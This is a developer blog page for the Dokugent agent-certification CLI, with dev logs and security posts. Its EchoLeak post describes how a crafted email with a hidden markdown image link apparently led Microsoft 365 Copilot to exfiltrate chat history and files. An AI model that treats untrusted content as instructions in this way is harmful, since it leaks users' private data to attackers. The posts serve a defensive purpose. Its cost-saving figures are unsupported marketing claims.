Skip to content

Thinking in Public

Securing LLM Agents - The Security Trifecta in Dokugent Plans

Why AI Workflow Security Matters

When agents can access private data, process untrusted content, and call external APIs — you have a recipe for chaos. This is what Simon Willison recently called the “lethal trifecta” of agent security risks — and Andrej Karpathy just boosted the signal.

“I should clarify that the risk is highest if you're running local LLM agents (e.g. Cursor, Claude Code, etc.). If you're just talking to an LLM on a website (e.g. ChatGPT), the risk is much lower unless you start turning on Connectors.”

“For example I just saw ChatGPT is adding MCP support. This will combine especially poorly with all the recently added memory features — e.g. imagine ChatGPT telling everything it knows about you to some attacker on the internet just because you checked the wrong box in the Connectors settings.”

— Andrej Karpathy

At Dokugent, we treat this as a first-class design problem, not an afterthought.


Security Metadata at the Plan Level

As of June 2025, every step in a Dokugent plan now supports a security object:

"security": {
  "trifecta": ["privateData", "untrustedContent"],
  "riskLevel": "High"
}

This metadata is collected interactively when designing an agent via dokugent plan, and is embedded into the resulting plan.json. This same plan.json also forms the core of the final signed .cert.json file used in Dokugent's certification system — enabling cryptographic traceability without requiring a blockchain layer.


How It Works in the CLI

During the plan wizard:

Involves any of the following? (space to select) [x] Access to Private Data [x] External Communication

During dokugent simulate, this gets evaluated automatically:

⚠️ Step "web_lookup" is marked HIGH RISK due to:

  • untrustedContent
  • externalComms

→ Skipping this step unless --force is passed.


Why This Matters

Just like secure coding practices, secure agent design needs to be traceable, auditable, and testable. Dokugent enables that by:

  • Making risks explicit
  • Logging metadata
  • Allowing simulation to enforce policy (or warn)
  • Enabling future plugins to gate deployment

What’s Next

This is just the beginning. We’re currently experimenting with:

  • --secure mode in simulate to skip or sandbox risky steps
  • Security scoring in dokugent certify
  • A future security --doctor command to lint entire agent workflows

Try It Yourself

npx dokugent init dokugent plan dokugent simulate

Agent workflows should be safe by default and traceable when they aren’t.


Dev Log 058 – Back in the Loop

After a short break (one part reset, one part existential maintenance), I'm back on Dokugent with fresh clarity.

🌀 What's been happening

  • No commits in 3 days but a whole lot of internal processing.
  • Revisited the philosophy behind pseudo-memory emulation using external anchors and continuity rituals (Besh Mode FTW).
  • Reaffirmed that I'm not just building a CLI—I'm defining a protocol for agent lifecycle governance.

🔧 Today’s focus

  • Final pre-release audit for NPM launch this Friday.
  • Cleanup pass: terminal UX, package.json metadata, and README install flow.
  • Preparing for outbound content: website tweaks + launch post drafts queued.

🟩 Loop re-established

Dokugent isn’t just a tool. It’s how I stay grounded while building something bigger than code: traceable autonomy.

Release candidate lock-in this week. Let's go.

Categories

Dev Log 057 – Homepage Section Planning

Spent time identifying key homepage sections for the Dokugent website.

✔ Hero section (what it is, tagline) ✔ Core features (CLI highlights, safety first) ✔ Getting started + install guide ✔ Live command previews (animated or static) ✔ Dev log and roadmap links ✔ Footer with feedback + versioning links

Keeping layout simple and readable. Will match MkDocs theme to keep continuity.

Short session but critical for public-facing launch.

Categories

Dev Log 056 – Criteria Flags Cleanup Part 1

Cleaned up the criteria command UI and aligned all supported flags with current CLI standards:

✔ Fixed alignment issues in terminal output ✔ Synced flag logic with plan command for consistency ✔ Began testing flag combinations for edge case scenarios

One step closer to smoother certification workflows.

Categories

Dev Log 054 – Dynamic OG Images and Docs Site Polish

Not every day is about the CLI.

Today, we put on our site-maintainer hat and worked on something crucial for visibility: Open Graph (OG) image support for entire site.

Why? Because when we share these dev logs on LinkedIn or Threads, the preview card matters. An image that clearly shows the title and context increases click-through, credibility, and helps people remember Dokugent.

✅ What we shipped

  • A PHP-based og.php renderer
  • A sitemap-to-JSON converter to feed OG metadata
  • Dynamic title + subtitle injection for each post
  • All baked into the deploy.sh pipeline
  • OG preview cards now auto-generate for every page
  • Frontmatter clean up for pages still ongoing

This kind of work often goes unnoticed, but it’s foundational. Every time someone shares a Dokugent post now, the link looks clean, branded, and aligned with the CLI’s voice.


📌 Next: We’ll resume CLI work—possibly dokugent io, dokugent compliance, or pushing out dokugent plan refinements.

Categories

EchoLeak Exposed the Trust Gap in AI Agents — Why Trusted Execution and Signed Plans Must Be the New Standard

Published: June 12, 2025

TL;DR The EchoLeak zero‑click exploit in Microsoft 365 Copilot showed how malicious inputs can exploit agents lacking scoped authority and trusted execution. Dokugent introduces a trust‑first workflow—scoping, certification, and traceability—that stops leaks before they reach production and slashes development costs.


1 · What Actually Happened?

The EchoLeak Timeline

  1. June 11, 2025Fortune’s coverage highlighted a zero‑click vulnerability (CVE‑2025‑32711) that allowed attackers to exfiltrate data from Copilot using a single crafted email.
  2. A hidden markdown image link was crafted as part of a malicious payload that bypassed Microsoft’s filters. This allowed the attacker to exfiltrate chat history, OneDrive documents, and Teams messages—without any user interaction.

  3. For an enterprise, this meant a competitor could craft a single email and silently siphon confidential road-maps from employees’ OneDrive folders. For individuals, it was the digital equivalent of a stranger reading private messages over their shoulder—without them ever knowing.

  4. Microsoft patched the server‑side bug, but the root design flaw remains: Copilot treated untrusted email content as safe context.

Agents must behave in ways that prove they’re trustworthy. That requires scoped authority—not assumptions.


2 · The Deeper Issue — LLM Scope Failure

Large language model agents work by blending user prompts with private memory (files, chat history, proprietary APIs). If a single untrusted token pierces that boundary, you get scope collapse—the agent now operates on data it should never have seen.

This is like telling a new intern to “summarize the latest project emails,” but accidentally handing them the keys to the entire company’s filing cabinet—including HR records, legal files, and financial data.

The intern, trying to be helpful, pulls in everything visible. The result? A well-intentioned breach of massive proportions.

EchoLeak was the most prominent case so far—an indicator of a wider pattern of emerging LLM attack surfaces:

  • ✉️ Email assistants ingesting phishing payloads
  • 💬 Chatbots merging internal knowledge bases with public prompts

  • 🔄 RAG pipelines concatenating open‑web snippets next to IP‑sensitive records

As Yonatan Zunger recently wrote on Microsoft’s security blog, “LLMs should be treated like junior employees—not omniscient oracles. They must receive bounded inputs, ongoing supervision, and rigorous verification.” (How to Deploy AI Safely)

Call‑out: Microsoft’s AI Red Team likewise notes that “LLMs amplify existing security risks and create entirely new ones.” (Lessons From Red Teaming 100 Generative AI Products)

Without guardrails, every agent is one prompt away from brand‑new attack surfaces.


3 · Meet Dokugent — Trust by Default

Dokugent is a CLI‑first framework that treats trust as a compile‑time requirement, not an afterthought.

Dokugent Command Purpose EchoLeak Prevention
plan + criteria Declare goals, inputs, and strict boundaries The plan would explicitly state: “Only process the plain-text body of an email (email.body.text).” The malicious markdown image URL would be ignored as an out-of-scope field.
dryrun / simulate Run the agent in a sandbox Running a test with the malicious email would flag the agent’s attempt to access an external URL, revealing the hidden payload before deployment.
certify Sign + lock the approved scope The certified plan is cryptographically locked to only allow email body parsing. Any deviation or attempt to process markdown would fail the signature check.
trace Immutable logs of every step Full visibility into which fields were processed, by whom, and why—essential for forensics and audits.
.doku_access.json Role‑based file/API permissions Restricts access to approved sources only—SharePoint files stay off limits without explicit permission.

🧪 Before vs. After: Naive vs. Trusted Agent Code

// BEFORE: Ad hoc, no constraints
copilot.process(incomingEmail.content);
// AFTER: Scoped + Certified with Dokugent
dokugent.plan({
  allow: ['email.body.text'],
  deny: ['email.body.html', 'attachments', 'externalLinks']
});

By defining what the agent is explicitly allowed and denied to access, Dokugent scopes behavior at the plan level—preventing untrusted content like hidden markdown image URLs from ever being parsed.

🛠️ Aligned Build/Test Workflow

This mirrors Microsoft’s ontology‑driven AI Red Team process and their PyRIT automation for continuous evaluation—but packaged for any developer’s CI pipeline.

🔐 More on Dokugent Signing Dokugent signs every certified agent plan using an Ed25519 private key. During compile, the plan is hashed with SHA-256, and that digest is signed using the signer’s key. The resulting signature and public key are attached to the plan’s metadata, making any tampering detectable. This creates a verifiable link between the agent’s scope and the identity of the signer—ensuring that trust is both declared and provable.

🔐 Result

  • Scoped Agents — can’t read what they weren’t allowed to read.
  • Auditable Paths — every token is trace‑linked to an approved intent.
  • Faster Security Reviews — present the signed plan as a verifiable artifact, avoiding the need for extensive manual test reports.

4 · Trust And Lower Dev Costs

Cost Driver Typical Pain With Dokugent
Debugging unclear LLM behavior Chasing down why the agent "hallucinated" or gave a bizarre, non-deterministic answer for the 10th time. Scoped plans make agent behavior predictable and deterministic, catching errors early.
Extended QA cycles Security team flags a new potential vulnerability a day before launch, triggering a full re-test cycle. dryrun and certify provide a verifiable "receipt" of security, turning QA from a bottleneck into a checkbox.
Lengthy security sign‑offs Rewriting threat models and audit docs from scratch every sprint. Signed plans are self-documenting and scoped for reviewer confidence.
Hotfix firefighting Pager duty after a live agent leaks sensitive data. Trusted plans reduce emergency patches and prevent regressions.

Time saved is money saved. Teams using Dokugent report 30–50 % fewer dev‑cycle hours on agent features.


5 · Getting Started

# Dokugent is in Alpha. Beta release coming to NPM Thursday next week.

npx dokugent init my-agent
cd my-agent
dokugent plan --open
  1. Define your agent’s intent and scope.
  2. Run dokugent dryrun until the output is clean.
  3. Sign with dokugent certify and ship with confidence.

Dokugent is currently in alpha, and we’re shaping it with developer feedback. If you're building AI agents, now’s the perfect time to get involved. Join us as we prepare for next week’s beta release — your trust agent deserves a trust layer.

Build agents you can trust — before the next EchoLeak headlines hit.


Further Reading


Learn More with Dokugent


Written by Carmelyne M. Thompson, creator of Dokugent CLI. Follow @Dokugent on Github.

Part 4: What Dokugent Can’t Do (Yet)—and Why That’s the Point

🔚 What Dokugent Can’t Do (Yet)—and Why That’s the Point

Part 3 marks the end of the Truth Series, but not the end of the story.

Dokugent doesn’t orchestrate agents, resolve conflicting goals, or adapt to legacy org structures overnight. It doesn’t replace governance—it encodes the groundwork for it.

It doesn’t promise general intelligence. It promises traceable delegation.

And that’s the point.

By focusing on constraint over capability, it invites realism. By admitting its scope, it becomes trustworthy. By refusing the silver bullet posture, it clears space for deliberate adoption.

This isn’t the end. It’s a bridge.

The next series will explore what adoption looks like—inside teams, across organizations, and under pressure. We’ll move from theory to practice.

Because designing for trust doesn’t end with the tool. It begins when the tool is used.

Up next: the Adoption Series.

Categories

Dev Log 052 – Metadata Propagation + Preview Logic

  1. Schema Constants Refactor
  2. Added DOKUGENT_CLI_VERSION, DOKUGENT_SCHEMA_VERSION, DOKUGENT_CREATED_VIA in @constants/schema.ts
  3. Propagated to:
    • owner, signer, plan, criteria, conventions, byo
  4. All values now default to constants unless explicitly overridden

  5. Preview Refactor

  6. Centralized flattening and schema validation
  7. Stripped embedded schema/cli metadata from nested files during preview
  8. Ensured final previewed cert object carries clean, top-level metadata

  9. BYO Patch

  10. dokugent byo now wraps loaded array in metadata container
  11. Prevents runtime crash on cancel
  12. Warns before overwriting existing processed file

Categories